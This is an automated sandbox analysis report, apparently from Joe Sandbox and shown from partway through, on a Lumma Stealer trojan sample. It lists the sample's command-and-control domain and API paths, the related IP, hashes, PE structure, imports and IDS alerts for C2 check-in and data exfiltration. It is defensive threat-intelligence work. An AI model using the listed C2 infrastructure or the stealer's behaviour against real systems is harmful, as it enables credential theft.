                                  https://duckduckgo.com/chrome_newtabuUtgy7BbF1.exe, 00000003.00000003.1390347162.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390264201.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390152896.0000000003B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://volcanohushe.click/TuUtgy7BbF1.exe, 00000003.00000003.2171537898.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.2171711444.00000000011E3000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1523262871.00000000011E4000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000002.2569920904.00000000011E4000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1509986181.00000000011E4000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://duckduckgo.com/ac/?q=uUtgy7BbF1.exe, 00000003.00000003.1390347162.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390264201.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390152896.0000000003B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icouUtgy7BbF1.exe, 00000003.00000003.1390347162.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390264201.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390152896.0000000003B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://volcanohushe.click/uUtgy7BbF1.exe, 00000003.00000003.1509986181.00000000011E4000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1480945277.000000000116B000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://volcanohushe.click:443/apiCLSIDuUtgy7BbF1.exe, 00000003.00000003.1562773864.0000000001169000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=uUtgy7BbF1.exe, 00000003.00000003.1390347162.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390264201.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390152896.0000000003B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.rootca1.amazontrust.com/rootca1.crl0uUtgy7BbF1.exe, 00000003.00000003.1447453560.0000000003B8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=uUtgy7BbF1.exe, 00000003.00000003.1390347162.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390264201.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390152896.0000000003B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://ocsp.rootca1.amazontrust.com0:uUtgy7BbF1.exe, 00000003.00000003.1447453560.0000000003B8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5uUtgy7BbF1.exe, 00000003.00000003.1448798991.0000000003B4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.ecosia.org/newtab/uUtgy7BbF1.exe, 00000003.00000003.1390347162.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390264201.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390152896.0000000003B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bruUtgy7BbF1.exe, 00000003.00000003.1448490159.0000000003DF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.uUtgy7BbF1.exe, 00000003.00000003.1448798991.0000000003B4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://volcanohushe.click/apiNAuUtgy7BbF1.exe, 00000003.00000003.1389246708.000000000116B000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1389102087.0000000001169000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1389289848.0000000001189000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://volcanohushe.click/apiNDuUtgy7BbF1.exe, 00000003.00000003.1389246708.000000000116B000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1389102087.0000000001169000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1389289848.0000000001189000.00000004.00000020.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://ac.ecosia.org/autocomplete?q=uUtgy7BbF1.exe, 00000003.00000003.1390347162.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390264201.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390152896.0000000003B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpguUtgy7BbF1.exe, 00000003.00000003.1448798991.0000000003B4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://x1.c.lencr.org/0uUtgy7BbF1.exe, 00000003.00000003.1447453560.0000000003B8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://x1.i.lencr.org/0uUtgy7BbF1.exe, 00000003.00000003.1447453560.0000000003B8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchuUtgy7BbF1.exe, 00000003.00000003.1390347162.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390264201.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390152896.0000000003B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?uUtgy7BbF1.exe, 00000003.00000003.1447453560.0000000003B8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&uuUtgy7BbF1.exe, 00000003.00000003.1448798991.0000000003B4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&ctauUtgy7BbF1.exe, 00000003.00000003.1448798991.0000000003B4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpguUtgy7BbF1.exe, 00000003.00000003.1448798991.0000000003B4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiuUtgy7BbF1.exe, 00000003.00000003.1448798991.0000000003B4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://volcanohushe.click/apipuUtgy7BbF1.exe, 00000003.00000003.1562872208.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.2171694091.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000002.2569837325.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1562578102.00000000011C4000.00000004.00000020.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://volcanohushe.click/apisuUtgy7BbF1.exe, 00000003.00000003.1510242320.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1510107757.00000000011C4000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1562872208.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.2171694091.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000002.2569837325.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1562578102.00000000011C4000.00000004.00000020.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          https://support.mozilla.org/products/firefoxgro.alluUtgy7BbF1.exe, 00000003.00000003.1448490159.0000000003DF4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=uUtgy7BbF1.exe, 00000003.00000003.1390347162.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390264201.0000000003B08000.00000004.00000800.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000003.1390152896.0000000003B0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://volcanohushe.click/NDuUtgy7BbF1.exe, 00000003.00000003.2171694091.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, uUtgy7BbF1.exe, 00000003.00000002.2569837325.00000000011C6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              104.21.71.155
                                                                              volcanohushe.clickUnited States
                                                                              13335CLOUDFLARENETUStrue
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1581192
                                                                              Start date and time:2024-12-27 08:14:10 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 5m 18s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:8
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:uUtgy7BbF1.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:425be48f2d7cc72615c4cdfda5341832.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@4/1@1/1
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HCA Information:
                                                                              • Successful, ratio: 95%
                                                                              • Number of executed functions: 48
                                                                              • Number of non-executed functions: 144
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              TimeTypeDescription
                                                                              02:15:05API Interceptor8x Sleep call for process: uUtgy7BbF1.exe modified
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              104.21.71.155bas.exeGet hashmaliciousLummaCBrowse
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                volcanohushe.clickLoader.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.145.201
                                                                                bas.exeGet hashmaliciousLummaCBrowse
                                                                                • 104.21.71.155
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                CLOUDFLARENETUSx4PaiRVIyM.exeGet hashmaliciousLummaCBrowse
                                                                                • 172.67.175.134
                                                                                3vLKNycnrz.exeGet hashmaliciousLummaCBrowse
                                                                                • 104.21.62.151
                                                                                installer.batGet hashmaliciousVidarBrowse
                                                                                • 172.64.41.3
                                                                                skript.batGet hashmaliciousVidarBrowse
                                                                                • 162.159.61.3
                                                                                din.exeGet hashmaliciousVidarBrowse
                                                                                • 172.64.41.3
                                                                                lem.exeGet hashmaliciousVidarBrowse
                                                                                • 172.64.41.3
                                                                                markiz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                • 104.26.13.205
                                                                                utkin.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                • 172.67.74.152
                                                                                0Gs0WEGB1E.dllGet hashmaliciousUnknownBrowse
                                                                                • 104.21.22.88
                                                                                Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                • 104.21.80.1
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                a0e9f5d64349fb13191bc781f81f42e1x4PaiRVIyM.exeGet hashmaliciousLummaCBrowse
                                                                                • 104.21.71.155
                                                                                3vLKNycnrz.exeGet hashmaliciousLummaCBrowse
                                                                                • 104.21.71.155
                                                                                Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                • 104.21.71.155
                                                                                NewI Upd v1.1.0.exeGet hashmaliciousLummaCBrowse
                                                                                • 104.21.71.155
                                                                                setup.exeGet hashmaliciousLummaCBrowse
                                                                                • 104.21.71.155
                                                                                exlauncher-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                • 104.21.71.155
                                                                                atw3.dllGet hashmaliciousGozi, UrsnifBrowse
                                                                                • 104.21.71.155
                                                                                installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                • 104.21.71.155
                                                                                0zBsv1tnt4.exeGet hashmaliciousLummaCBrowse
                                                                                • 104.21.71.155
                                                                                cqHMm0ykDG.exeGet hashmaliciousLummaCBrowse
                                                                                • 104.21.71.155
                                                                                No context
                                                                                Process:C:\Users\user\Desktop\uUtgy7BbF1.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):15
                                                                                Entropy (8bit):3.906890595608518
                                                                                Encrypted:false
                                                                                SSDEEP:3:SXhRi75n:SC5
                                                                                MD5:3A33AF4BC7DC9699EE324B91553C2B46
                                                                                SHA1:4CCE2BF1011CA006FAAB23506A349173ACC40434
                                                                                SHA-256:226D20C16ED4D8DDDFD00870E83E3B6EEDEDB86704A7BF43B5826B71D61500AE
                                                                                SHA-512:960194C8B60C086520D1A76B94F52BA88AC2DDEC76A18B2D7ABF758FFFF138E9EDD23E62D4375A34072B42FBA51C6D186554B1AA71D60835EF1E18BEB8873B1D
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:1.29548Enjoy!..
                                                                                File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                Entropy (8bit):0.39346751807127767
                                                                                TrID:
                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                File name:uUtgy7BbF1.exe
                                                                                File size:19'414'528 bytes
                                                                                MD5:425be48f2d7cc72615c4cdfda5341832
                                                                                SHA1:093d262086312a5f86ec903ea321cfbe0d3bb4fe
                                                                                SHA256:4c55b2bc8fb77aaaf71552039073386e76cce6ee45fee54d2c8fd84aba97d691
                                                                                SHA512:d038f7255a91a0fb02268fb920a1bb5db4502e18c5f2ace67a1ccc384cd3ef1567eaafb7ff727436ce84d7d265027a2e7cb2fedfa9da7af65bf3fe49e7e8e847
                                                                                SSDEEP:12288:luB9du8NOZx84E5YoS7OJlnDYrPLPJgu4dgT6lYDfAmy/yqvkkheLk:u9du88Zx8VAeDgPLxZ4GO+y5heQ
                                                                                TLSH:FD17D011B58CC0F2D863147758B6EBAA863EB9200F226ADFB7940D7ACF352D19731716
                                                                                File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...WZig..........".................R.............@.......................................@.................................dH..<..
                                                                                Icon Hash:00928e8e8686b000
                                                                                Entrypoint:0x40ef52
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows cui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x67695A57 [Mon Dec 23 12:40:55 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:6
                                                                                OS Version Minor:0
                                                                                File Version Major:6
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:6
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:5cc7e689f2864a0a9a8589c00efad8df
                                                                                Instruction
                                                                                call 00007F28306D4D6Ah
                                                                                jmp 00007F28306D4BD9h
                                                                                mov ecx, dword ptr [00436840h]
                                                                                push esi
                                                                                push edi
                                                                                mov edi, BB40E64Eh
                                                                                mov esi, FFFF0000h
                                                                                cmp ecx, edi
                                                                                je 00007F28306D4D66h
                                                                                test esi, ecx
                                                                                jne 00007F28306D4D88h
                                                                                call 00007F28306D4D91h
                                                                                mov ecx, eax
                                                                                cmp ecx, edi
                                                                                jne 00007F28306D4D69h
                                                                                mov ecx, BB40E64Fh
                                                                                jmp 00007F28306D4D70h
                                                                                test esi, ecx
                                                                                jne 00007F28306D4D6Ch
                                                                                or eax, 00004711h
                                                                                shl eax, 10h
                                                                                or ecx, eax
                                                                                mov dword ptr [00436840h], ecx
                                                                                not ecx
                                                                                pop edi
                                                                                mov dword ptr [00436880h], ecx
                                                                                pop esi
                                                                                ret
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                sub esp, 14h
                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                xorps xmm0, xmm0
                                                                                push eax
                                                                                movlpd qword ptr [ebp-0Ch], xmm0
                                                                                call dword ptr [00434AC4h]
                                                                                mov eax, dword ptr [ebp-08h]
                                                                                xor eax, dword ptr [ebp-0Ch]
                                                                                mov dword ptr [ebp-04h], eax
                                                                                call dword ptr [00434A78h]
                                                                                xor dword ptr [ebp-04h], eax
                                                                                call dword ptr [00434A74h]
                                                                                xor dword ptr [ebp-04h], eax
                                                                                lea eax, dword ptr [ebp-14h]
                                                                                push eax
                                                                                call dword ptr [00434B0Ch]
                                                                                mov eax, dword ptr [ebp-10h]
                                                                                lea ecx, dword ptr [ebp-04h]
                                                                                xor eax, dword ptr [ebp-14h]
                                                                                xor eax, dword ptr [ebp-04h]
                                                                                xor eax, ecx
                                                                                leave
                                                                                ret
                                                                                mov eax, 00004000h
                                                                                ret
                                                                                push 00437E18h
                                                                                call dword ptr [00434AE4h]
                                                                                ret
                                                                                mov al, 01h
                                                                                ret
                                                                                push 00030000h
                                                                                push 00010000h
                                                                                push 00000000h
                                                                                call 00007F28306DC54Bh
                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x348640x3c.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3a0000x1d70.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x30d080x18.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2d0080xc0.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x34a0c0x16c.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x2a52b0x2a600ca7697ad91eaacd837ed51179759a947False0.5367809734513275data6.539348053061756IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata0x2c0000x9d7c0x9e00964f1e27d13bf05fbdae349f651c8112False0.4288221914556962data4.95389314063731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0x360000x25e40x1600f9cffcfbe2a982ed0d73caf2c5c26405False0.40678267045454547data4.770466622070642IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .tls0x390000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .reloc0x3a0000x1d700x1e00050a442cf25b388dea29342e31853d9fFalse0.7709635416666667data6.524650010128688IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                .bss0x3c0000x4be000x4be00efc7aa847f859737dfbd486ef2521483False1.0003249845551894data7.999368503304723IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                DLLImport
                                                                                KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                USER32.dllDefWindowProcW
                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-12-27T08:15:04.525486+01002058534ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (volcanohushe .click)1192.168.2.9556871.1.1.153UDP
                                                                                2024-12-27T08:15:06.163000+01002058535ET MALWARE Observed Win32/Lumma Stealer Related Domain (volcanohushe .click in TLS SNI)1192.168.2.949707104.21.71.155443TCP
                                                                                2024-12-27T08:15:06.163000+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949707104.21.71.155443TCP
                                                                                2024-12-27T08:15:06.908362+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.949707104.21.71.155443TCP
                                                                                2024-12-27T08:15:06.908362+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949707104.21.71.155443TCP
                                                                                2024-12-27T08:15:08.351844+01002058535ET MALWARE Observed Win32/Lumma Stealer Related Domain (volcanohushe .click in TLS SNI)1192.168.2.949708104.21.71.155443TCP
                                                                                2024-12-27T08:15:08.351844+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949708104.21.71.155443TCP
                                                                                2024-12-27T08:15:09.131944+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.949708104.21.71.155443TCP
                                                                                2024-12-27T08:15:09.131944+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949708104.21.71.155443TCP
                                                                                2024-12-27T08:15:10.869660+01002058535ET MALWARE Observed Win32/Lumma Stealer Related Domain (volcanohushe .click in TLS SNI)1192.168.2.949719104.21.71.155443TCP
                                                                                2024-12-27T08:15:10.869660+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949719104.21.71.155443TCP
                                                                                2024-12-27T08:15:13.916099+01002058535ET MALWARE Observed Win32/Lumma Stealer Related Domain (volcanohushe .click in TLS SNI)1192.168.2.949725104.21.71.155443TCP
                                                                                2024-12-27T08:15:13.916099+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949725104.21.71.155443TCP
                                                                                2024-12-27T08:15:16.622137+01002058535ET MALWARE Observed Win32/Lumma Stealer Related Domain (volcanohushe .click in TLS SNI)1192.168.2.949731104.21.71.155443TCP
                                                                                2024-12-27T08:15:16.622137+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949731104.21.71.155443TCP
                                                                                2024-12-27T08:15:18.188581+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.949731104.21.71.155443TCP
                                                                                2024-12-27T08:15:19.857325+01002058535ET MALWARE Observed Win32/Lumma Stealer Related Domain (volcanohushe .click in TLS SNI)1192.168.2.949742104.21.71.155443TCP
                                                                                2024-12-27T08:15:19.857325+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949742104.21.71.155443TCP
                                                                                2024-12-27T08:15:22.743964+01002058535ET MALWARE Observed Win32/Lumma Stealer Related Domain (volcanohushe .click in TLS SNI)1192.168.2.949750104.21.71.155443TCP
                                                                                2024-12-27T08:15:22.743964+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949750104.21.71.155443TCP
                                                                                2024-12-27T08:15:22.750164+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.949750104.21.71.155443TCP
                                                                                2024-12-27T08:15:26.672861+01002058535ET MALWARE Observed Win32/Lumma Stealer Related Domain (volcanohushe .click in TLS SNI)1192.168.2.949758104.21.71.155443TCP
                                                                                2024-12-27T08:15:26.672861+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.949758104.21.71.155443TCP
                                                                                2024-12-27T08:15:27.536196+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.949758104.21.71.155443TCP
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 27, 2024 08:15:04.892524958 CET49707443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:04.892576933 CET44349707104.21.71.155192.168.2.9
                                                                                Dec 27, 2024 08:15:04.892676115 CET49707443192.168.2.9104.21.71.155
                                                                                Dec 27, 2024 08:15:04.895401001 CET49707443192.168.2.9104.21.71.155
